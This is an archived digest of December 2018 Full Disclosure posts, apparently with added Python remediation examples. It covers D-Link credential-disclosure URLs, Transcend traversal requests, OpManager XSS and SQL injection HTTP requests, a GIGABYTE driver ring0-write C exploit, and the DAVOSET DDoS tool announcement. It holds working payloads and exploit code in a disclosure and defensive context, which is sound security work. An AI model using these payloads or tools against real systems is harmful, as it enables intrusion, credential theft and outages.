Re: [FD] LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)

2018-12-21 Thread Henri Salo
On Thu, Dec 20, 2018 at 09:03:08AM +0800, zzt0907 wrote:
> # LibTIFF 4.0.8 has multiple memory leak vulnerabilities (CVE-2017-16232)
> https://github.com/shelltdf/libtiff/commit/25f9ffa56548c1846c4a1f19308b7f561f7b1ab0

I'm curious why you post about a minor memory leak over a year after the fix,
in an old version and in a tool (not the library)? Also note that
http://www.libtiff.org/tools.html says "Many of them however are more intended
to serve as programming examples for using the TIFF library."

You might want to test the latest version of the library. Their git can be
found at https://gitlab.com/libtiff/libtiff.

-- 
Henri Salo

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] [CVE-2018-18009] dirary0.js on D-Link DIR-140L, DIR-640L devices allows remote unauthenticated attackers to discover admin credentials

2018-12-21 Thread Tyler Cui
[Vendor]
us.dlink.com


[Product]
DIR-140L (version 1.02)
DIR-640L (version 1.01RU)
Other versions might also be affected.


[Vulnerability Type]
admin credentials disclosure


[Affected Component]
Web Interface


[CVE Reference]
CVE-2018-18009


[Security Issue]
An authenticated user can visit the file dirary0.js, for example,
http://victime_ip/dirary0.js, and obtain the clear-text password of the admin
user at the line:

gosave_ok = ("__password__".length < 6)?true:false

[Network Access]
Remote via Web Interface


[Authentication]
Not required


[Disclosure Timeline]
2018-06-17: Vendor Notification
2018-06-19: Vendor acknowledgement
2018-10-23: Request update
2018-10-26: Vendor: "I don't have an update currently, but fixes are under 
development."
2018-12-07: Inform vendor of disclosure
2018-12-17: Public Disclosure




[FD] [CVE-2018-18008] spaces.htm on multiple D-Link devices (DSL, DIR, DWR) allows remote unauthenticated attackers to discover admin credentials

2018-12-21 Thread Tyler Cui
[Vendor]
us.dlink.com


[Product]
D-Link DSL-2770L (version ME_1.01, ME_1.02, AU_1.06)
D-Link DIR-140L, DIR-640L (version 1.00, 1.01RU, 1.02)
D-Link DWR-116, DWR-512, DWR-555, DWR-921 (version V1.03, V1.05, V2.01, V2.02)

[Vulnerability Type]
admin credentials disclosure


[Affected Component]
Web Interface


[CVE Reference]
CVE-2018-18008


[Security Issue]
An authenticated user can visit the page spaces.htm, for example,
http://victime_ip/spaces.htm, and obtain the clear-text password of the admin
user at the line:

xxx="__password__";

[Network Access]
Remote via Web Interface


[Authentication]
Not required


[Disclosure Timeline]
2018-06-17: Vendor Notification
2018-06-19: Vendor acknowledgement
2018-10-23: Request update
2018-10-26: Vendor: "I don't have an update currently, but fixes are under 
development."
2018-12-07: Inform vendor of disclosure
2018-12-17: Public Disclosure




[FD] [CVE-2018-18007] atbox.htm on D-Link DSL-2770L devices allows remote unauthenticated attackers to discover admin credentials

2018-12-21 Thread Tyler Cui
[Vendor]
us.dlink.com


[Product]
D-Link DSL-2770L (version ME_1.01, ME_1.02, AU_1.06)


[Vulnerability Type]
admin credentials disclosure


[Affected Component]
Web Interface


[CVE Reference]
CVE-2018-18007


[Security Issue]
An authenticated user can visit the page atbox.htm, for example,
http://victime_ip/atbox.htm, and obtain the clear-text password of the admin
user at the line:

else if(ff.curpd.value != "__password__") location="atbox_pd.htm"


[Network Access]
Remote via Web Interface


[Authentication]
Not required


[Disclosure Timeline]
2018-06-17: Vendor Notification
2018-06-19: Vendor acknowledgement
2018-10-23: Request update
2018-10-26: Vendor: "I don't have an update currently, but fixes are under 
development."
2018-12-07: Inform vendor of disclosure
2018-12-17: Public Disclosure




[FD] CVE-2018-20211 - DLL Hijacking in Exiftool v8.3.2.0

2018-12-21 Thread Rafael Pedrero




[FD] CVE-2018-20193 - Privilege escalation in Juniper Secure Access SSL VPN - SA-4000, 5.1R5 (build 9627) 4.2 Release (build 7631)

2018-12-21 Thread Rafael Pedrero
In 2006...





[FD] DAVOSET v.1.3.7

2018-12-21 Thread MustLive

Hello participants of Mailing List.

Since the announcement of DAVOSET in 2010 and all its releases, I've made the
next update of the software. Recently DAVOSET v.1.3.7 was released - DDoS
attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

GitHub: https://github.com/MustLive/DAVOSET

Download DAVOSET v.1.3.7:

http://websecurity.com.ua/uploads/2018/DAVOSET_v.1.3.7.rar

In the new version, a verbose mode was added, and an SSRF vulnerability in
Microsoft Forefront Unified Access Gateway 2010 was added. New services were
also added to the full list of zombies, the default settings were changed, and
non-working services were removed from the full list of zombies.

In total there are 205 zombie-services in the list.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 





[FD] New vulnerabilities in Transcend Wi-Fi SD Card

2018-12-21 Thread MustLive

Hello list!

There are Directory Traversal and Cross-Site Request Forgery vulnerabilities
in Transcend Wi-Fi SD Card.

-
Affected products:
-

Vulnerable is the following model: Transcend Wi-Fi SD Card 16 GB, Firmware v.1.8.
This model with other firmware versions and other Transcend models may also
be vulnerable. Transcend didn't answer whether they will fix these and other holes.

--
Details:
--

There are two modes of connection to the flash card: Direct Share and
Internet Mode. In the first mode a device with Wi-Fi is connected to this
card, and in the second mode the card itself is connected to Wi-Fi devices
(access point, router or smartphone with Personal Hotspot enabled); then
all computers on the LAN will have access to it. All mentioned attacks work
in both modes.

Address 192.168.0.70 is a dynamic IP that is assigned in the second mode of
work (DHCP at the router or AP); the address will change, so it must be found
first for the attack, e.g. by IP scanning or in the router's stats.

Directory Traversal (WASC-33):

Reading list of directories:

http://192.168.0.70/cgi-bin/show_pic.cgi?dir=/etc
http://192.168.0.70/cgi-bin/show_video.cgi?dir=/etc
http://192.168.0.70/cgi-bin/file_list.pl?dir=/www/sd/../../etc

Directory Traversal (WASC-33):

Arbitrary files disclosure:

http://192.168.0.70/cgi-bin/wifi_download?fn=wsd.conf=/www/sd/../mtd/config

This is the configuration file with logins and passwords for the admin panel,
for the flash card itself via Wi-Fi, and for the access point (Wi-Fi router).

Cross-Site Request Forgery (WASC-09):

Among multiple CSRF vulnerabilities in the admin panel there is an attack for
remote login: in the login process there is no captcha, so besides the lack of
protection against BF, a CSRF attack can also be made. It's possible to
remotely enter the admin panel (with the default login and password) for
conducting further CSRF attacks.

http://admin:admin@192.168.0.70;>


Timeline:


2014.05.10 - found vulnerabilities in Transcend Wi-Fi SD Card 16 GB.
2015.08.01 - announced at my site. Later informed the developers. They thanked
me, but didn't answer whether they will fix these vulnerabilities.
2017.01.28 - disclosed previous vulnerabilities at my site.
2017.03.28 - announced new vulnerabilities.
2017.04.02 - informed the developers. They didn't answer.
2018.05.12 - disclosed at my site (http://websecurity.com.ua/8533/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



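
The directory traversal described in the post above works because the dir= value reaches the file system without being confined to the SD-card root. As an added example (not Transcend's firmware code), the following Python shows the unchecked resolution beside a resolver that normalises the path first and then verifies it is still under the root, exercised on the advisory's own request URLs; the root path, the function names and the sample requests are assumptions (the requests are built from the advisory).

```python
"""Confining user-supplied path parameters to the card's web root.

Added example, not Transcend's firmware. It models the dir= parameter of the
show_pic.cgi / show_video.cgi / file_list.pl scripts and the file name given
to wifi_download, and shows the check that rejects the "/etc" and
"/www/sd/../../etc" requests quoted in the advisory. WEB_ROOT, the function
names and the sample requests are assumptions.
"""
import posixpath
from urllib.parse import parse_qs, urlsplit

WEB_ROOT = "/www/sd"  # assumed directory the card is meant to expose


def vulnerable_resolve(user_dir):
    """How the traversal happens: the parameter is joined and normalised but
    never checked, so an absolute path replaces the root and ../ walks out of it."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, user_dir))


def safe_resolve_dir(user_dir):
    """Return the normalised path if it is still inside WEB_ROOT, else None.
    The check runs on the normalised result, so '..' and a leading '/' are both
    caught; commonpath (not startswith) also rejects a sibling such as /www/sd2."""
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, user_dir))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


def safe_resolve_file(user_fn):
    """A download name must be a bare file name: no separators, no '..', no NUL."""
    if (not user_fn or user_fn in (".", "..") or "/" in user_fn
            or "\\" in user_fn or "\x00" in user_fn):
        return None
    return posixpath.join(WEB_ROOT, user_fn)


def check_request(url):
    """Classify one request URL as 'allow' or 'deny' with the safe resolvers; fail closed."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "dir" in params:
        return "allow" if safe_resolve_dir(params["dir"][0]) is not None else "deny"
    if "fn" in params:
        return "allow" if safe_resolve_file(params["fn"][0]) is not None else "deny"
    return "deny"


# Constructed sample requests: the advisory's dir= values, a traversal in the
# download file name, and two legitimate requests.
SAMPLE_REQUESTS = [
    "http://192.168.0.70/cgi-bin/show_pic.cgi?dir=/etc",
    "http://192.168.0.70/cgi-bin/file_list.pl?dir=/www/sd/../../etc",
    "http://192.168.0.70/cgi-bin/wifi_download?fn=../mtd/config",
    "http://192.168.0.70/cgi-bin/show_pic.cgi?dir=/www/sd/DCIM",
    "http://192.168.0.70/cgi-bin/wifi_download?fn=IMG_0001.JPG",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(check_request(url), url)
```

The decisive point is the order of operations: normalise first, then compare against the root. Checking the raw string for ".." misses the absolute-path case (dir=/etc) and encoded variants, while checking after normalisation catches both with one comparison.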


[FD] Zoho ManageEngine OpManager 12.3 before build 123239 allows XSS in the Notes column of the Alarms section

2018-12-21 Thread Murat Aydemir
I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before build 123239 allows XSS in the
Notes column of the Alarms section

II. CVE REFERENCE
-
CVE-2018-20339

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
20/12/2018 OPManager replied that they had fixed it

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product (version 12.3) was vulnerable to stored
XSS attacks. A successful exploit of this attack could allow theft of
users' sessions or arbitrary JavaScript code execution on the remote host.
References: https://www.manageengine.com/network-monitoring/help/read-me.html,
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
POST /api/json/alarm/addNotes?apiKey=5f5e26abc7bf2af2a5669cf258ec8385=true HTTP/1.1
Host: vulnerablehost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost/apiclient/ember/index.jsp
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: JSESSIONID=DF47AA5596862216FF9BBBAE234975C1;
encryptPassForAutomaticSignin=82a3161ad68e57b6;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator;
opmcsrfcookie=5bb7df90-d1a4-4942-ae64-e5308fb5d501;
f2RedirectUrl=http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FAlarms%2FAlarm%2FDetails%2Fk_192.168.252.150_URL_Poll;
NFA__SSO=57D7F0938B20457F49BB1791E756CAC3
DNT: 1
Connection: close

notes=aabbcc%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_notes_parameter')%2F%2F=k_192.168.252.150_URL_Poll

-- 

This message and its attachments are confidential and intended solely for the
recipient(s) stated therein. This message cannot be copied, distributed or
published for any purpose. If you are not the intended recipient, please do not
copy, publish or forward the information existing in the content and attachments
of this message. In such case please notify the sender immediately and delete
all the copies of the message. Our company shall have no liability for any
changes in or late receiving of the message, loss of integrity and
confidentiality, viruses and any damages caused in any way to your computer
system based on this message.


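
The stored XSS in the post above comes down to the notes value being written into the alarm page without encoding. As an added example (not ManageEngine's code), the following Python decodes the notes payload quoted in the PoC, shows raw interpolation into a table cell beside an html.escape() rendering of the same cell, and adds a server-side markup check run over constructed addNotes form bodies; the render functions, the regex and the sample bodies are assumptions.

```python
"""Stored XSS through a 'notes' field: unsafe vs. escaped rendering, plus an input check.

Added example, not ManageEngine's code. It decodes the notes value quoted in
the PoC, shows why interpolating it into an HTML table cell executes the
payload, shows the html.escape() rendering that keeps it inert, and runs a
small markup detector over constructed addNotes form bodies. The render
functions, the detector and the sample bodies are assumptions.
"""
import html
import re
from urllib.parse import parse_qs, unquote_plus

# The notes value exactly as URL-encoded in the PoC (the trailing parameter dropped).
NOTES_PAYLOAD = unquote_plus(
    "aabbcc%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_notes_parameter')%2F%2F")

# Anything that could start a tag, an event-handler attribute or a script URL.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def render_notes_unsafe(notes):
    """The vulnerable pattern: raw user text dropped into attribute and element
    context. The payload's leading '">' closes the title attribute and the tag,
    so the browser sees a new <svg onload=...> element."""
    return '<td class="notes" title="%s">%s</td>' % (notes, notes)


def render_notes_safe(notes):
    """Same markup, but every user-controlled character is entity-encoded first.
    quote=True also encodes ' and ", which is what makes the attribute context safe."""
    safe = html.escape(notes, quote=True)
    return '<td class="notes" title="%s">%s</td>' % (safe, safe)


def contains_markup(value):
    """True if a free-text field holds something that would be read as HTML/JS."""
    return MARKUP_RE.search(value) is not None


def scan_form_body(body):
    """Return the names of fields in an addNotes form body that contain markup.
    Meant as a server-side alert signal, not a replacement for output encoding."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(name for name, values in fields.items()
                  if any(contains_markup(v) for v in values))


# Constructed form bodies: the PoC's notes value, and a legitimate operator note.
SAMPLE_BODIES = [
    "notes=aabbcc%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_notes_parameter')%2F%2F",
    "notes=Disk+replaced%2C+alarm+cleared+by+operator",
]

if __name__ == "__main__":
    print("unsafe:", render_notes_unsafe(NOTES_PAYLOAD))
    print("safe:  ", render_notes_safe(NOTES_PAYLOAD))
    for body in SAMPLE_BODIES:
        print(scan_form_body(body) or "clean", body)
```

Output encoding at the point where the note is rendered is the fix; the input-side scan only tells you that someone is trying, which is useful for alerting but would block legitimate notes that happen to mention a tag.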

[FD] Zoho ManageEngine OpManager 12.3 before build 123239 allows SQL injection in the Alarms section

2018-12-21 Thread Murat Aydemir
I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before build 123239 allows SQL
injection in the Alarms section

II. CVE REFERENCE
-
CVE-2018-20338

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
20/12/2018 OPManager replied that they had fixed it

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product (version 12.3) was vulnerable to SQL
injection attacks. A successful exploit of this attack could allow
arbitrary code execution or unauthenticated access to database
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
GET /api/json/alarm/listAlarms?isFluidic=true=true=5f5e26abc7bf2af2a5669cf258ec8385=ActiveAlarms=true=true&_search=true=1539945434261=100=1=modTime=desc=%7b%22groupOp%22%3a%22AND%22%2c%22rules%22%3a[%7b%22field%22%3a%22message%22%2c%22op%22%3a%22cn%22%2c%22data%22%3a%22test78275719'%20or%201268%3d1268--%20%22%7d]%7d&_=1539935356081 HTTP/1.1
Host: vulnerablehost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost/apiclient/ember/index.jsp
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=X; encryptPassForAutomaticSignin=X;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=X;
opmcsrfcookie=X
DNT: 1
Connection: close

-- 



[FD] Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection via the getGraphData API

2018-12-21 Thread Murat Aydemir
I. VULNERABILITY
-
Zoho ManageEngine OpManager 12.3 before 123238 allows SQL injection
via the getGraphData API.

II. CVE REFERENCE
-
CVE-2018-20173

III. VENDOR
-
https://www.manageengine.com

IV. TIMELINE
-
20/11/18 Vulnerability discovered
20/11/18 Vendor contacted
17/12/2018 OPManager replied that they had fixed it

V. CREDIT
-
Murat Aydemir from Biznet Bilisim A.S.

VI. DESCRIPTION
-
ManageEngine OPManager product (version 12.3) was vulnerable to SQL
injection attacks. A successful exploit of this attack could allow
arbitrary code execution or unauthenticated access to database
information.
References: https://www.manageengine.com/network-monitoring/help/read-me.html
https://bugbounty.zoho.com/bb/info#hof

VII. PoC
-
GET /api/json/v2/device/getGraphData?name=192.168.252.150=WMI-MemoryUtilization=WMI-MemoryUtilization10376381'%20or%20'11'%3d'11=Today=true=XX&_=1539935355622 HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://vulnerablehost.com/apiclient/ember/index.jsp
OPMCurrentRoute:
http%3A%2F%2F192.168.252.150%3A8061%2Fapiclient%2Fember%2Findex.jsp%23%2FInventory%2FSnapshot%2FMonitoringDevice%2F192.168.252.150%2FPerfGraph%2FWMI-MemoryUtilization%2FWMI-MemoryUtilization
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=XXX; encryptPassForAutomaticSignin=XXX;
userNameForAutomaticSignin=admin;
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;
authrule_name=Authenticator; NFA__SSO=X;
opmcsrfcookie=X
DNT: 1
Connection: close

-- 


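
The two OpManager SQL injection posts above (the listAlarms filter object and the getGraphData graph-name parameter) share one root cause: a user value pasted into SQL text. The following Python, added here and not ManageEngine's code, reproduces the effect of both quoted payloads against an in-memory SQLite database and shows the parameterised form with an allow-list for the filter's field and operator names; the schema, rows and function names are assumptions.

```python
"""SQL injection via a filter object and a lookup parameter: string-built vs. parameterised.

Added example, not ManageEngine's code. An in-memory SQLite database stands in
for the OpManager backend so the two payloads quoted in the PoCs (the
listAlarms filter JSON and the getGraphData graph-name value) can be run
against string-built queries and against parameterised queries with a
field/operator allow-list. Table layout, column names and rows are constructed.
"""
import json
import sqlite3
from urllib.parse import unquote

# Filter object exactly as URL-encoded in the listAlarms PoC.
FILTER_PAYLOAD = unquote(
    "%7b%22groupOp%22%3a%22AND%22%2c%22rules%22%3a[%7b%22field%22%3a%22message%22"
    "%2c%22op%22%3a%22cn%22%2c%22data%22%3a%22test78275719'%20or%201268%3d1268--%20%22%7d]%7d")
# Graph-name value as URL-encoded in the getGraphData PoC.
GRAPH_PAYLOAD = unquote("WMI-MemoryUtilization10376381'%20or%20'11'%3d'11")

# jqGrid-style operators the filter builder understands: SQL operator and LIKE pattern.
OPS = {"eq": ("=", "{}"), "cn": ("LIKE", "%{}%"), "bw": ("LIKE", "{}%")}
ALLOWED_FIELDS = {"message", "device", "severity"}


def make_db():
    """Constructed sample data: three alarms and three graph series."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE alarms(id INTEGER PRIMARY KEY, device TEXT, severity TEXT, message TEXT);
        INSERT INTO alarms(device, severity, message) VALUES
            ('192.168.252.150', 'critical', 'URL poll failed'),
            ('192.168.252.151', 'warning',  'CPU utilization above 90%'),
            ('192.168.252.152', 'clear',    'Interface up');
        CREATE TABLE graphs(id INTEGER PRIMARY KEY, device TEXT, graph TEXT, value REAL);
        INSERT INTO graphs(device, graph, value) VALUES
            ('192.168.252.150', 'WMI-MemoryUtilization', 61.5),
            ('192.168.252.150', 'WMI-CPUUtilization', 12.0),
            ('192.168.252.151', 'WMI-MemoryUtilization', 40.2);
    """)
    return conn


def list_alarms_vulnerable(conn, filter_json):
    """Builds the WHERE clause by concatenation: the quote inside 'data' ends the
    literal, "or 1268=1268" is always true and "--" comments out the rest, so
    every alarm row comes back."""
    f = json.loads(filter_json)
    clauses = []
    for rule in f["rules"]:
        op, pattern = OPS[rule["op"]]
        clauses.append("%s %s '%s'" % (rule["field"], op, pattern.format(rule["data"])))
    sql = "SELECT id FROM alarms WHERE " + (" %s " % f["groupOp"]).join(clauses)
    return sorted(row[0] for row in conn.execute(sql))


def list_alarms_safe(conn, filter_json):
    """Allow-lists field, operator and groupOp (the parts that must become SQL
    text) and binds the user data as a parameter (the part that must stay data)."""
    f = json.loads(filter_json)
    if f.get("groupOp") not in ("AND", "OR"):
        raise ValueError("unsupported groupOp")
    clauses, params = [], []
    for rule in f["rules"]:
        if rule["field"] not in ALLOWED_FIELDS or rule["op"] not in OPS:
            raise ValueError("field/operator not allowed: %r" % (rule,))
        op, pattern = OPS[rule["op"]]
        clauses.append("%s %s ?" % (rule["field"], op))
        params.append(pattern.format(rule["data"]))
    sql = "SELECT id FROM alarms WHERE " + (" %s " % f["groupOp"]).join(clauses)
    return sorted(row[0] for row in conn.execute(sql, params))


def get_graph_data_vulnerable(conn, device, graph):
    """The getGraphData shape: two user values formatted straight into the query."""
    sql = ("SELECT value FROM graphs WHERE device='%s' AND graph='%s' ORDER BY id"
           % (device, graph))
    return [row[0] for row in conn.execute(sql)]


def get_graph_data_safe(conn, device, graph):
    """Same query with both values bound; the quote in the payload is just a character."""
    sql = "SELECT value FROM graphs WHERE device=? AND graph=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (device, graph))]


if __name__ == "__main__":
    db = make_db()
    print("listAlarms vulnerable:", list_alarms_vulnerable(db, FILTER_PAYLOAD))
    print("listAlarms safe:      ", list_alarms_safe(db, FILTER_PAYLOAD))
    print("getGraphData vulnerable:", get_graph_data_vulnerable(db, "192.168.252.150", GRAPH_PAYLOAD))
    print("getGraphData safe:      ", get_graph_data_safe(db, "192.168.252.150", GRAPH_PAYLOAD))
```

Column and operator names cannot be bound as parameters, which is why the safe builder keeps an explicit allow-list for them; everything else in the filter object is passed to the driver as data and never touches the query text.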

[FD] Capstone disassembler v4.0 is out!

2018-12-21 Thread Nguyen Anh Quynh
Greetings,

We are super excited to announce version 4.0 of Capstone disassembler
framework!

Exactly 5 years ago, on December 18th of 2013, we published the first
version. Today, this release 4.0 marks 5 years of our project! Such a long
journey, which is impossible without huge community support!

In no particular order, we would like to thank Thinkst Canary, NowSecure, ECQ,
Senrio, GracefulBits & Catena Cyber for sponsoring this release!

We also wish to express our sincere gratitude to all contributors &
donators, who generously supported us to maintain Capstone project!

More details are available at http://capstone-engine.org/Version-4


(For those who do not know, Capstone is an open source multi-arch,
multi-platform disassembly engine, with homepage at
http://capstone-engine.org)

Thanks,
Quynh

http://www.keystone-engine.org
http://www.capstone-engine.org
http://www.unicorn-engine.org



[FD] [CORE-2018-0007] - GIGABYTE Driver Elevation of Privilege Vulnerabilities

2018-12-21 Thread advisories
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

GIGABYTE Drivers Elevation of Privilege Vulnerabilities

*1. Advisory Information*

Title: GIGABYTE Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0007
Advisory URL:
http://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Gigabyte
Release mode: User release

*2. Vulnerability Information*

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-19320, CVE-2018-19322, CVE-2018-19323, CVE-2018-19321

*3. Vulnerability Description*

GIGABYTE's website states that[1]:

Founded in 1986, GIGABYTE is committed to providing top-notch solutions
that "upgraded your life". We are regarded as a pioneer in innovation
with groundbreaking excitements such as Ultra Durable, WINDFORCE, and
BRIX series. We have also invented a premium gaming brand AORUS, a full
spectrum of gaming products for gamers and enthusiast. GIGABYTE has
continuously brought unique new ways of digital world and created
marvelous products that empower you with meaningful and charming
experiences.

Multiple vulnerabilities were found in the GPCIDrv and GDrv drivers as
bundled with several GIGABYTE and AORUS branded motherboard and graphics
card utilities, which could allow a local attacker to elevate privileges.

*4. Vulnerable Packages*

   . GIGABYTE APP Center v1.05.21 and previous
   . AORUS GRAPHICS ENGINE v1.33 and previous
   . XTREME GAMING ENGINE v1.25 and previous
   . OC GURU II v2.08

Other products and versions might be affected, but they were not tested.

*5. Vendor Information, Solutions and Workarounds*

The vendor did not provide fixes or workaround information.

*6. Credits*

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
SecureAuth Advisories Team.

*7. Technical Description / Proof of Concept Code*

GIGABYTE App Center, RGBFusion, Xtreme Engine, AORUS Graphics Engine,
etc. use low level drivers to program and query the status on several
embedded ICs on their hardware. Fan curves, clock frequencies, LED
colors, thermal performance, and other user customizable properties and
monitoring functionality are exposed to applications through these low
level kernel drivers.

The main subjects of this advisory are two of the device drivers
installed/loaded by affected GIGABYTE utilities (GPCIDrv and GDrv), from
now on addressed as "GPCI" and "GIO". The default installation allows
non-privileged user processes (even running at LOW INTEGRITY) to get a
HANDLE and issue IOCTL codes to these drivers.

The following sections describe the problems found.

*7.1. Arbitrary ring0 VM read/write*

[CVE-2018-19320]
There is ring0 memcpy-like functionality built into GIO's IOCTL
0xC3502808, allowing a local attacker to take complete control of the
affected system.

Proof of Concept:

/-
// GIGABYTE PoC demonstrating non-privileged R/W access to arbitrary
// virtual memory

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define IOCTL_GIO_MEMCPY 0xC3502808

HANDLE ghDriver = 0;

#pragma pack (push,1)

// Input buffer layout expected by IOCTL 0xC3502808: destination, source, byte count
typedef struct _GIO_MemCpyStruct {
    ULONG64 dest;
    ULONG64 src;
    DWORD size;
} GIO_MemCpyStruct;

#pragma pack(pop)

BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
    GIO_MemCpyStruct mystructIn = { dest, src, size };
    BYTE outbuffer[0x30] = { 0 };
    DWORD returned = 0;

    DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn,
        sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
    if (returned) {
        return TRUE;
    }
    return FALSE;
}

BOOL InitDriver()
{
    // Device object exposed by GDrv; opened with a plain user-mode handle
    char szDeviceNames[] = "\\\\.\\GIO";
    ghDriver = CreateFileA(szDeviceNames, GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL, NULL);

    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver \'%s\' - GetLastError:%lu\n",
            szDeviceNames, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    if (!InitDriver()) {
        exit(0);
    }
    printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n");
    printf("press ENTER for instant BSOD\n");
    getchar();
    /* the original constant was lost in the archived copy; the write to
       address 0 below crashes regardless of the value */
    ULONG64 data = 0x0;
    GIO_memcpy(0, (ULONG64)&data, 8);
    CloseHandle(ghDriver);

    return 0;
}
-/

*7.2. Port mapped I/O access*

[CVE-2018-19322]
Both GPCI and GIO expose functionality to read/write data from/to IO
ports. This could be leveraged in a number of ways to ultimately run
code with elevated privileges.

Proof of Concept:

/-
// GIGABYTE PoC demonstrating 

[FD] [CORE-2017-0012] - ASUS Drivers Elevation of Privilege Vulnerabilities

2018-12-21 Thread advisories
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

ASUS Drivers Elevation of Privilege Vulnerabilities

*1. Advisory Information*

Title: ASUS Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2017-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities
Date published: 2018-12-18
Date of last update: 2018-12-18
Vendors contacted: Asus
Release mode: User release

*2. Vulnerability Information*

Class: Exposed IOCTL with Insufficient Access Control [CWE-782],
Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL
with Insufficient Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535

*3. Vulnerability Description*

ASUS offers several drivers and utilities [1] in order to give the user
more control over certain settings and functions of the motherboard.
In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,
combining and controlling the LEDs of all your Aura-enabled products
from a single application to achieve perfect, synchronized harmony. From
motherboards and RGB strips to graphics cards and beyond, Aura Sync
enables a veritable symphony of light for ultimate personalization.

Multiple vulnerabilities were found in the GLCKIo and Asusgio drivers
installed by ASUS Aura Sync, which could allow a local attacker to
elevate privileges.

*4. Vulnerable Packages*

. ASUS Aura Sync v1.07.22 and previous versions
Other products and versions might be affected, but they were not tested.

*5. Vendor Information, Solutions and Workarounds*

The vendor did not provide fixes or workaround information.

*6. Credits*

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo from
